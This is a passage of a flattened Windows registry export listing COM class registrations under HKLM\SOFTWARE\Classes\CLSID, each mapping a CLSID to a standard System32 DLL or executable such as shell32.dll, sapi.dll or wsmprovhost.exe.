%SystemRoot%\system32\rdpendp.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{92192FD8-C1CB-434B-A8E8-B7F3AC424EE4}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\oobe\msoobedui.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{92337A8C-E11D-11D0-BE48-00C04FC30DF6}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\oleprn.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{924ccc1b-6562-4c85-8657-d177925222b6}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\shell32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{9264B7DC-A82F-4AFD-89C8-4F399DA7B028}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\wlanpref.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{926749fa-2615-4987-8845-c33e65f2b957}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\UIRibbon.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{926b23ab-fd60-43f1-8f63-b24cabdf5316}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\shell32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{926f41f7-003e-4382-9e84-9e953be10562}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\mfsrcsnk.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{9271B890-7BBF-48DB-ACB3-F973DC34156D}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\rasdlg.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{927907E5-A066-4b07-BD4F-F53C7B748124}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\umpowmi.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{927971f5-0939-11d1-8be1-00c04fd8d503}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\activeds.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{927ea2af-1c54-43d5-825e-0074ce028eee}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\energytask.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{9280E842-F931-4D24-B074-739FB4DA43F4}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\twinui.pcshell.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{92A8CCF5-2725-4E95-9264-74FAB86FBBCA}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\SettingSyncCore.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{92ab5af7-a374-417e-b2e2-9b317353a322}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\shell32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{92ad68ab-17e0-11d1-b230-00c04fb9473f}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\stclient.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{92b66080-5e2d-449e-90c4-c41f268e5514}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\mfcore.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{92BC73D8-9313-42CC-8C1B-FCF94ED2C7B4}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\enterprisecsps.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{92CC85F4-ACA4-4D72-94C8-49D1CAD0985F}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\wlanpref.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{92D2CC58-4386-45a3-B98C-7E0CE64A4117}\InProcServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\StructuredQuery.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{9301E380-1F22-11D3-8226-D2FA76255D47}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\dmloader.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{9311A763-D284-4CE5-B2AA-6A99D9305D60}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\SettingSyncCore.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{9324DA94-50EC-4A14-A770-E90CA03E7C8F}\DefaultIcon (Default) REG_EXPAND_SZ %SystemRoot%\system32\themeui.dll,7 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{9324DA94-50EC-4A14-A770-E90CA03E7C8F}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\themeui.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{93412589-74D4-4E4E-AD0E-E0CB621440FD} LocalizedString REG_EXPAND_SZ @%SystemRoot%\System32\FontExt.dll,-8007 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{93412589-74D4-4E4E-AD0E-E0CB621440FD}\DefaultIcon (Default) REG_EXPAND_SZ %SystemRoot%\System32\fontext.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{93412589-74D4-4E4E-AD0E-E0CB621440FD}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\shdocvw.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{93412589-74D4-4E4E-AD0E-E0CB621440FD}\Instance\InitPropertyBag ResourceDLL REG_EXPAND_SZ %SystemRoot%\system32\fontext.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{9343812e-1c37-4a49-a12e-4b2d810d956b}\DefaultIcon (Default) REG_EXPAND_SZ %SystemRoot%\System32\searchfolder.dll,-323 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{9343812e-1c37-4a49-a12e-4b2d810d956b}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\SearchFolder.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{934A7048-1E4A-4D6E-9A9A-CB739F519B07}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\xwizards.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{934A9523-A3CA-4BC5-ADA0-D6D95D979421}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\dpnet.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{934D4698-6A59-48f8-9F29-9FB30670320E}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\StructuredQuery.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{935249A5-B5E8-43F6-A991-61435E5954B3}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\explorerframe.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{937847E7-C78A-4834-9CE8-5F3EC99BD604}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\AuthExt.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{9381AF33-66A3-4D5A-8AF2-9515B1DC19A5}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\rasgcw.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{939D20AC-8036-406F-BD5C-BF672896BD71}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\explorerframe.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{93a56381-e0cd-485a-b60e-67819e12f81b}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\explorerframe.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{93AAD2A0-036A-4B11-A078-DA8776B38139}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\windows.applicationmodel.datatransfer.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{93AC9CB8-27D5-4482-BFDF-68F21C7454A3}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\mscandui.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{93C063B0-68CB-4DE7-B032-8F56C1D2E99D}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\MMDevApi.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{93CB110F-9189-4349-BD9F-392D9A4D0096}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\accessibilitycpl.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{93cf36dd-dc00-499c-8477-7cbe51501a15}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\twinui.pcshell.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{93F7AA8E-CF82-4CB7-9251-48BC637A43B8}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\certmgr.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{942A8E4F-A261-11D1-A760-00C04FB9603F}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\appmgr.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{94357B53-CA29-4b78-83AE-E8FE7409134F}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\shell32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{9440861a-25ca-4bc2-833e-866a6191d110}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\twinui.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{9440F424-33D8-4114-BC6E-033867239A09}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\Speech_OneCore\Common\sapi_onecore.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{9456A480-E88B-43EA-9E73-0B2D9B71B1CA}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\windowscodecs.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{94596c7e-3744-41ce-893e-bbf09122f76a}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\SmartcardCredentialProvider.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{947812B3-2AE1-4644-BA86-9E90DED7EC91}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\Speech\Common\sapi.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{948B45F7-EFB8-46fb-8704-B340D847227A}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\windows.storage.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{948CFD8C-1888-4E52-8703-99610347EBB6}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\audioeng.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{94a909a5-6f52-11d1-8c18-00c04fd8d503}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\adsmsext.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{94AB5C27-C954-4218-B0A1-29640412EFBE}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\recovery.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{94abaf2a-892a-11d1-bbc4-00a0c90640bf} LocalizedString REG_EXPAND_SZ @%SystemRoot%\System32\devmgr.dll,- 1356 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{94abaf2a-892a-11d1-bbc4-00a0c90640bf}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\devmgr.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{94B23D4D-1040-4C4B-9081-85D8D6FA36C4}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\twinui.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{94d86820-3128-41cd-be63-5e7bbd96a958}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\ttlscfg.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{94E7F5BD-FC4F-446C-93D2-3942E8FE34C9}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\SettingSync.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{94FBC195-CB86-4142-9A6A-8E9CCF0D4F4D}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\oobe\msoobeplugins.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{956FADED-2450-4ABB-9F8C-4629FAFEBB92}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\listsvc.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{958A1709-3B44-11D1-AD74-00C04FC2ADC0}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\txflog.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{95B4ABA8-6D5B-4F99-9A9D-4A5EF4C75AFD}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\twinui.pcshell.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{95CE8412-7027-11D1-B879-006008059382}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\shell32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{95F39BD0-A301-49BF-B80C-017F5616B26A}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\twinui.pcshell.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{96236A71-9DBC-11DA-9E3F-0011114AE311}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\msrdc.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{96236A85-9DBC-11DA-9E3F-0011114AE311}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\msrdc.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{96236A8F-9DBC-11DA-9E3F-0011114AE311}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\msrdc.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{96236A90-9DBC-11DA-9E3F-0011114AE311}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\msrdc.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{96236A91-9DBC-11DA-9E3F-0011114AE311}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\msrdc.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{964A239F-6039-4A44-BB9B-EC0FEAFE28FC}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\ShareHost.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{96749373-3391-11D2-9EE3-00C04F797396}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\Speech\Common\sapi.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{96749377-3391-11D2-9EE3-00C04F797396}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\Speech\Common\sapi.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{9678f47f-2435-475c-b24a-4606f8161c16}\LocalServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\wsmprovhost.exe ServerExecutable REG_EXPAND_SZ %systemroot%\system32\wsmprovhost.exe HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{968AD211-D1B1-444B-9F59-51701D1128D3}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\remoteaudioendpoint.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{96b42929-01f1-468c-b521-6294ab438f4a}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\windows.ui.creddialogcontroller.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{96B9DAE3-CF15-45e9-9719-57285348225E}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\SearchFolder.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{96C8AD95-C199-44DE-B34E-AC33C442DF39}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\Pimstore.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{971127BB-259F-48c2-BD75-5F97A3331551}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\mstscax.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{9743B50B-3190-4061-8DA3-BE13AA02181E}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\wlanpref.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{974C63D2-6846-4F6B-BF27-BF71ADB1E608}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\PrintPlatformConfig.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{975797FC-4E2A-11D0-B702-00C04FD8DBF7}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\els.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{978b010d-d731-48af-b6a9-afe5dfe2fac9}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\AppLockerCsp.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{97CBCB09-9D73-4D90-9311-A78626569953}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\SpatialStore.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{97e467b4-98c6-4f19-9588-161b7773d6f6}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\propsys.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{98068995-54d2-4136-9bc9-6dbcb0a4683f}\LocalServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\WinrsHost.exe ServerExecutable REG_EXPAND_SZ %systemroot%\system32\WinrsHost.exe HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{981D9411-909E-42A7-8F5D-A747FF052EDB}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\windowscodecs.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{9821D278-84E2-4D6A-8712-2C6E23D43C7B}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\EnterpriseModernAppMgmtCSP.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{987D8DFA-3E2C-4929-9C51-61AC8E00CBC3}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\shacct.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{98859A6C-02F2-43FC-ADB0-CE6D10F1A1AA}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\fhcpl.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{9885AEF2-BD9F-41E0-B15E-B3141395E803}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\mapstoasttask.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{989D1DC0-B162-11D1-B6EC-D27DDCF9A923}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\msxml3.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{98A1B01E-E363-46e9-A68F-C6078DAABB8C}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\dmcsps.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{98A238A9-D8A2-4E57-84AF-6CF88FF719DA}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\SettingSyncCore.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{98BB952B-B23E-4737-8ABD-B553E7484B38}\LocalServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\DeviceEnroller.exe HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{98F275B4-4FFF-11E0-89E2-7B86DFD72085}\DefaultIcon (Default) REG_EXPAND_SZ %SystemRoot%\system32\SearchFolder.dll,-323 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{98F275B4-4FFF-11E0-89E2-7B86DFD72085}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\SearchFolder.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{990a9f8f-301f-45f7-8d0e-68c5952dba43}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\shell32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{990F07C7-78DC-4BD2-B145-5F791410BDDE}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\TelephonyInteractiveUser.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{992CFFA0-F557-101A-88EC-00DD010CCC48} InfoTip REG_EXPAND_SZ @%SystemRoot%\system32\netshell.dll,-1201 LocalizedString REG_EXPAND_SZ @%SystemRoot%\system32\netshell.dll,-1200 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{992CFFA0-F557-101A-88EC-00DD010CCC48}\DefaultIcon (Default) REG_EXPAND_SZ %SystemRoot%\system32\netshell.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{992CFFA0-F557-101A-88EC-00DD010CCC48}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\netshell.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{995C996E-D918-4a8c-A302-45719A6F4EA7}\LocalServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\rundll32.exe %SystemRoot%\System32\shell32.dll,SHCreateLocalServerRunDll {995C996E-D918-4a8c-A302-45719A6F4EA7} HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{99793286-77CC-4B57-96DB-3B354F6F9FB5}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\directmanipulation.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{99847C33-B1B4-11D1-8F10-00C04FC2C17B}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\comuid.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{99969a8f-27e6-4adf-ab9f-b5b5e90d4733}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\shell32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{99acf7f6-ef55-4ef9-8e27-3b784a6b4639}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\twinui.pcshell.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{99c0179c-c20c-488c-a510-bd779b9376ae}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\bcdsrv.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{99CDC6E0-DA00-4dfa-8EB8-831D774F8891}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\shacct.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{99cdfdaf-3573-4d97-bc06-d7c36627edef}\InProcServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\WwanConn.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{99D353BC-C813-41ec-8F28-EAE61E702E57}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\ntshrui.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{99d6470e-d780-4fce-99d2-40324846c10b}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\windows.storage.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{99EB9580-04EC-4B4C-99F5-52B616D444D9}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\Speech\Engines\SR\srloc.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{9a010fcc-488b-4836-94fd-c489f8e1ed7d}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\ndishc.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{9a02e012-6303-4e1e-b9a1-630f802592c5}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\propsys.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{9a07804e-7050-41d5-a244-badc038df532}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\shell32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{9A17DFD1-34FA-4D61-B9BB-3A1097E7FADF}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\tscfgwmi.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{9A4B942C-C16D-44D2-BDAA-1BD772A4050B}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\Speech_OneCore\Common\sapi_onecore.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{9A653086-174F-11D2-B5F9-00104B703EFD}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\wbem\fastprox.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{9A7C3FC6-8C9E-40A8-8CD9-0F3715483825}\InProcServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\lpksetupproxyserv.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{9a97f12a-6b73-4dc4-b3c1-e9244c03adac}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\shell32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{9a97f12a-6b73-4dc4-b3c1-e9244c03adac}\LocalServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\rundll32.exe %SystemRoot%\System32\shell32.dll,SHCreateLocalServerRunDll {9a97f12a-6b73-4dc4-b3c1-e9244c03adac} HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{9aa46009-3ce0-458a-a354-715610a075e6}\LocalServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\rundll32.exe %SystemRoot%\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{9ab3b1c9-3225-4bb4-93b6-bfb3c0d93743}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\shell32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{9ac9fbe1-e0a2-4ad6-b4ee-e212013ea917}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\windows.storage.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{9acf41ed-d457-4cc1-941b-ab02c26e4686}\LocalServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\wsmprovhost.exe ServerExecutable REG_EXPAND_SZ %systemroot%\system32\wsmprovhost.exe HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{9AED384E-CE8B-11D1-8B05-00600806D9B6}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\wbem\wbemdisp.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{9b359d1b-ad5c-412f-a654-a431424359de}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\cscobj.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{9B39403C-8B6D-430D-AE71-9EE1DC6E74C5}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\SettingMonitor.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{9b4e5207-9539-4258-b4a0-4e70e9e565ec}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\usercpl.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{9B67E7B7-12BA-4B81-9874-E96D8C7C07F8}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\mfsrcsnk.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{9B78F0E6-3E05-4A5B-B2E8-E743A8956B65}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\rdpsharercom.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{9BA05971-F6A8-11CF-A442-00A0C90A8F39}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\shell32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{9BA05971-F6A8-11CF-A442-00A0C90A8F39}\ToolboxBitmap32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\shell32.dll, 260 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{9BA05972-F6A8-11CF-A442-00A0C90A8F39}\LocalServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\rundll32.exe shell32.dll,SHCreateLocalServerRunDll {9BA05972-F6A8-11CF-A442-00A0C90A8F39} HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{9BC773B8-9B6C-400F-8AF0-0DFDD1C43229}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\Speech_OneCore\Common\sapi_onecore.dll 